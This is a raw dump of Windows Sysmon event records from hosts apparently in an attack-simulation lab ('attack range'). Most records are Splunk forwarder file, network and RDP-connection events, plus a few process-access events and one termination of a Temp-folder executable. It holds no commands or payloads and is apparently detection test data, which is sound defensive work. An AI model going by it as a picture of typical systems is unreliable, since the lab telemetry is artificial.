23542300x8000000000000000219321Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:31.740{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF727AEC0558FBA77910499ADBB8AE94,SHA256=6E9A7B019114292F1AE08BF428E450D9DF00B6C93E618A0695439BC21752639D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295225Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:31.359{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38DAFD2DDD4C7B6010BB4A5A742965CA,SHA256=D460486C18ACBD4180DCFBA9CD9E8003F836E32948795F98AFC5FB41311550F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219324Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:32.928{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A71F708067BAFAF20E7789E4660E87B2,SHA256=30335F2EF2BAF06B66848EEE758D5EB5B30356807E6D19A15CF5FF6FC55C3A68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219323Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:32.771{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B27622009992E8FB2A92775BC255ED1,SHA256=B7703396FB2A63C7A232D04FC7AD3F40981716FAA7A4E1FABAB21724F74B4BDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295226Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:32.534{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D7D36BDCC5946CF1B132ABF14C14EF4,SHA256=64753E042E130762923E6182B707FA525207CFACEFF2998AC5AE6D7D436F2B04,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219322Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:30.357{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx65353-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:33.787{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=012004A628EE39951912EDE044B3FCE9,SHA256=F0C8A1EAE3A37A91DED041E76B2D22D7AC8283B5143E6C7B2359B27F5C0E6CE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:33.540{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDDBC4B507A3BDBA1F2B0663DC7EF8E,SHA256=40FF079C9CC467A6E76C72F1ADFBE0753FE8E9890B7771E543A08AFC171E88C7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219325Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:30.673{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51514-false10.0.1.12-8000- 23542300x8000000000000000295227Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:33.471{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CF9EB13C28BFBD0B1D137602D1CEA976,SHA256=9898C3883AFD0F4CB0EF0C9456F62168246C1AF1AA86C7692ECF05F104C5BFCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:34.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F836341290696A4450E6717680DF81A4,SHA256=AC21B78ED967DDA1887467B4C84FB0A081D1C6B17E7A4812C3A506C4216496CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:35.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CC1898C8F2DB31FDC44F2DEDFEF6146,SHA256=72439DEE9877BB410785426E9EDAD16FBF815ECF82FEC6C2ED578C6C8F45CEA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:35.006{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C17976A0AAD053CC83256D6B5B0C4A1,SHA256=00AEA9EA5E8D8C88FED98818762F91EB5ECDDB84EAEDA5AE15333B007FC1BE69,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:32.686{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49212-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:36.601{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AB37052F2FF6AF7006C97FA64908503,SHA256=2CBEEDADDA3581B2CC1139DD96B998AA2ED9CA98F5092F90B6013C7738D24BFD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:33.524{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx64389-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:36.115{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F00A3869F4DE8326FB832C9DC12937DD,SHA256=A8237DD0257D5CDC23BFC0414C044690391A60C9C04C30CE4D19B017125DD2D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:37.620{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E869E96AD975C18C1118B71233D81687,SHA256=A88EF0B22ED5B15CC1280A8983BE0F692F058D2A3BDBAB3C24B5894B3B47ECB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:37.146{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FD90E3B6C3EE0B9C79C02847E0D20D2F,SHA256=9CB87D4BA3FB3800FCFE6C58C250AA5D1677243F95CF885725556995F9CB253F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:37.131{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43A57BAEFC82BBD1721EEFD8B0714A17,SHA256=ECB37067D02EC1FE4DC671C188F59216D945FCF67138230A9655AF926F6DF4E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:38.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDF00420560B8C7F59B0A72540B8E8EF,SHA256=5DDAADAA4E7D4013FD8F29409ACCCEDE1A522F90CD241DAA3AABEB96DF856346,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:36.532{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51515-false10.0.1.12-8000- 23542300x8000000000000000219332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:38.349{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71316B6014C337EECB72929D419B81BE,SHA256=D91BA7A0844F2BC76F6A159AAF679EDC59117BA9490F9E0B53A94275AE45E15B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:38.449{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-148MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:39.670{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D65DCCE0CDEBD77394690433B95A8DF,SHA256=30060ABAB1F36B067DEEE26BC59DF50AE61B514C9B49698D9ABBE72C388270BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:39.459{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6FC542325EA6FA54BDB290E67555B1A,SHA256=727D1CE9274ABEC7F194758907AA2DF9D98E2EFA6D515F7A7BB9AFF16518BA44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:39.457{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-149MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:40.552{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=523504B37C7F3EA3A1D351F111B6DEE0,SHA256=7C8C9880439E0383B08C3E345A7CAAEF2F625F7F82E0FDAA6ECA05B3246D09DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:40.552{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE764B7EE6B7FAA8252E596008C3CC61,SHA256=DEB7F774FF1216994301D899A398A1615A9EAEF2D2F5FDC8D90412D64431F752,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:40.685{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A637B8D79B34863E241EA564600D19D3,SHA256=285EF0A9E86FCB1A516E4B59565E99D1D56E456ABFB39C27ADF57E8EC6318E5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:40.185{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:37.976{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx49924-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:41.568{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=651DFC1048C9A6C76EF7B8169537B3A2,SHA256=16E88506EA7CDD2DBAC8B7759053F81D96F1B8692D2BF55C5C84A0425A4EC279,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:41.753{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=29444ACE9C0343B516053734CF5E5544,SHA256=9DDBA03067033B5AEA8EB41276319377BEEFCFE20923E37A397DCF65B930EFBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:41.720{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C96427D64B34017E586F3964D0BA01D0,SHA256=1F2FC96F678967AF2447EC42704B468D834904F0C1E33C82B9DDC1EE40C4C790,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:38.691{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49214-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 534500x8000000000000000295245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:42.940{C8EA50B7-14EB-6216-B406-000000003802}6332C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:42.755{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57384DE70C42EBC7085C5EA41DACA5EC,SHA256=8079BB1EF17DE459C33DD0A94D79E7D98925774CD6708AEA1E703E456B30007A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:42.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E92CBD3C286AF37C0C579B2BFF50F0BB,SHA256=0CEC34755892235168ECE562DB0632AA68631F11815B6C42A1840C7000C7A028,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:39.643{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49215-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000295246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:43.757{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97D09592358F7397C667E2C535D22D6,SHA256=C09F28783B41DD4ADA02B03FD1879FFDB949EF40EF833D131247AD77FA832695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:43.630{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0E39A790ED7BDE6D9854D6746899C55,SHA256=5F5358FD6D57D090CD0DA2B1BB615DC1719FCA08794A596225A188A8C35FBEE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:41.178{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx51631-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:44.773{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DFAECF0D8AD4BF84ED79076CD098153,SHA256=B3CD34030ADCFA2F73CA59463D8BE79792AC58FE09AF2FB976FFBB71917B16F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83021C806C979AC485B7D83F588FD0AA,SHA256=694E436D09BFEE0D201D2906C3F79C533A4B55D46444F61B00D579BBBFA5D831,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1508-6216-C204-000000003902}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:44.677{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791